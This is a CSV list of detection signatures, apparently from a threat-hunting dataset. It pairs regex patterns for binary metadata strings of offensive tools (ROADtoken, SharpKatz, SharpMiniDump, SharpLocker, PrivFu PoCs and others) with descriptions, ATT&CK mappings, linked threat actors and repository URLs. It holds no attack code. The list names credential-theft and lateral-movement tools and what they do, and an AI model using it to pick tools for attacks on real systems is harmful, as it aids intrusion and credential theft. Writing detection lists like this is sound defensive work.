"*>ROADToken.exe<*",".{0,1000}\>ROADToken\.exe\<.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","0","#originalfilename","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","20506" "*>ROADToken<*",".{0,1000}\>ROADToken\<.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a 
cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","0","#productname","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","20507" "*>Router Scan by Stas'M<*",".{0,1000}\>Router\sScan\sby\sStas\'M\<.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","20508" "*>RouterPassView<*",".{0,1000}\>RouterPassView\<.{0,1000}","offensive_tool_keyword","RouterPassView","help you to recover your lost password from your router file","T1002 - T1552 - T1027","TA0006 - TA0007","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/router_password_recovery.html","1","0","#productname","N/A","10","10","N/A","N/A","N/A","N/A","20509" "*>S4uDelegator<*",".{0,1000}\>S4uDelegator\<.{0,1000}","offensive_tool_keyword","PrivFu","perform S4U logon with SeTcbPrivilege","T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","S4uDelegator","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20511" "*>S4ULogonShell<*",".{0,1000}\>S4ULogonShell\<.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20512" "*>SafetyKatz<*",".{0,1000}\>SafetyKatz\<.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation 
- Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#companyname","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","20513" "*>SandmanBackdoorTimeProvider<*",".{0,1000}\>SandmanBackdoorTimeProvider\<.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#productname","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","20514" "*>Seatbelt<*",".{0,1000}\>Seatbelt\<.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#productname","fp risks","8","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","20516" "*>SeAuditPrivilegePoC<*",".{0,1000}\>SeAuditPrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20517" "*>SeBackupPrivilegePoC<*",".{0,1000}\>SeBackupPrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20518" "*>SecondaryLogonVariant<*",".{0,1000}\>SecondaryLogonVariant\<.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20519" "*>SeCreatePagefilePrivilegePoC<*",".{0,1000}\>SeCreatePagefilePrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20520" "*>SeCreateTokenPrivilegePoC<*",".{0,1000}\>SeCreateTokenPrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20521" "*>SeDebugPrivilegePoC<*",".{0,1000}\>SeDebugPrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20522" "*>SeRestorePrivilegePoC<*",".{0,1000}\>SeRestorePrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20523" "*>SeSecurityPrivilegePoC<*",".{0,1000}\>SeSecurityPrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20524" "*>SeShutdownPrivilegePoC<*",".{0,1000}\>SeShutdownPrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive 
token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20525" "*>SeSystemEnvironmentPrivilegePoC<*",".{0,1000}\>SeSystemEnvironmentPrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20526" "*>SeTakeOwnershipPrivilegePoC<*",".{0,1000}\>SeTakeOwnershipPrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20529" "*>SeTcbPrivilegePoC<*",".{0,1000}\>SeTcbPrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20530" "*>SeTrustedCredManAccessPrivilegePoC<*",".{0,1000}\>SeTrustedCredManAccessPrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20531" "*>ShareAudit.exe<*",".{0,1000}\>ShareAudit\.exe\<.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#originalfilename","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","20532" "*>SharpAltSecIds<*",".{0,1000}\>SharpAltSecIds\<.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","#productname","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","20533" "*>SharpAVKB<*",".{0,1000}\>SharpAVKB\<.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#productname","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","20534" "*>SharpChrome<*",".{0,1000}\>SharpChrome\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpChrome","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20535" "*>SharpChrome<*",".{0,1000}\>SharpChrome\<.{0,1000}","offensive_tool_keyword","SharpChrome","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpChrome","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20536" "*>SharpClipboard<*",".{0,1000}\>SharpClipboard\<.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","0","#productname","N/A","8","1","N/A","N/A","N/A","N/A","20537" "*>SharpCOM<*",".{0,1000}\>SharpCOM\<.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","0","N/A","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","20538" "*>SharpDecryptPwd<*",".{0,1000}\>SharpDecryptPwd\<.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","20539" "*>SharpDPAPI<*",".{0,1000}\>SharpDPAPI\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - 
T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpDPAPI","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20540" "*>SharpDPAPI<*",".{0,1000}\>SharpDPAPI\<.{0,1000}","offensive_tool_keyword","SharpDPAPI","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpDPAPI","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20541" "*>SharpDump<*",".{0,1000}\>SharpDump\<.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","#companyname","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","20542" "*>SharpEfsPotato<*",".{0,1000}\>SharpEfsPotato\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20543" "*>SharpEfsPotato<*",".{0,1000}\>SharpEfsPotato\<.{0,1000}","offensive_tool_keyword","SharpEfsPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20544" "*>SharpEventLog<*",".{0,1000}\>SharpEventLog\<.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","#content","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","20545" "*>SharpGPO<*",".{0,1000}\>SharpGPO\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20546" 
"*>SharpGPO<*",".{0,1000}\>SharpGPO\<.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20547" "*>SharpGPOAbuse<*",".{0,1000}\>SharpGPOAbuse\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpGPOAbuse","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20548" "*>SharpGPOAbuse<*",".{0,1000}\>SharpGPOAbuse\<.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpGPOAbuse","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20549" "*>SharpGraphView<*",".{0,1000}\>SharpGraphView\<.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation 
toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","0","#productname","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","20550" "*>SharpHound<*",".{0,1000}\>SharpHound\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20551" "*>SharpHound<*",".{0,1000}\>SharpHound\<.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#productname","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","20552" "*>SharpHound<*",".{0,1000}\>SharpHound\<.{0,1000}","offensive_tool_keyword","sharphound","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - 
TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20553" "*>SharpIncrease<*",".{0,1000}\>SharpIncrease\<.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","0","N/A","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","20554" "*>SharpKatz<*",".{0,1000}\>SharpKatz\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20555" "*>SharpKatz<*",".{0,1000}\>SharpKatz\<.{0,1000}","offensive_tool_keyword","SharpKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20556" 
"*>SharpLAPS<*",".{0,1000}\>SharpLAPS\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpLAPS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20557" "*>SharpLAPS<*",".{0,1000}\>SharpLAPS\<.{0,1000}","offensive_tool_keyword","SharpLAPS","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpLAPS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20558" "*>SharpLocker<*",".{0,1000}\>SharpLocker\<.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","#productname","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","20559" "*>Sharpmad<*",".{0,1000}\>Sharpmad\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - 
TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","Sharpmad","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20560" "*>Sharpmad<*",".{0,1000}\>Sharpmad\<.{0,1000}","offensive_tool_keyword","Sharpmad","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","Sharpmad","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20561" "*>SharpMapExec<*",".{0,1000}\>SharpMapExec\<.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","#productname","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","20562" "*>SharpMiniDump<*",".{0,1000}\>SharpMiniDump\<.{0,1000}","offensive_tool_keyword","SharpMiniDump","Create a minidump of the LSASS process from memory","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/b4rtik/SharpMiniDump","1","0","#productname","N/A","10","3","260","49","2022-11-02T15:47:30Z","2019-09-15T13:45:42Z","20563" "*>SharpNBTScan<*",".{0,1000}\>SharpNBTScan\<.{0,1000}","offensive_tool_keyword","SharpNBTScan","a NetBIOS scanner. 
Ghost actors use this tool for hostname and IP address enumeration","T1018 - T1046","TA0007","Ghost Ransomware","N/A","Discovery","https://github.com/BronzeTicket/SharpNBTScan","1","0","#productname","N/A","7","1","71","4","2021-08-06T05:36:55Z","2021-07-12T08:57:39Z","20564" "*>SharpRDP<*",".{0,1000}\>SharpRDP\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpRDP","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20565" "*>SharpRDP<*",".{0,1000}\>SharpRDP\<.{0,1000}","offensive_tool_keyword","SharpRDP","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpRDP","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20566" 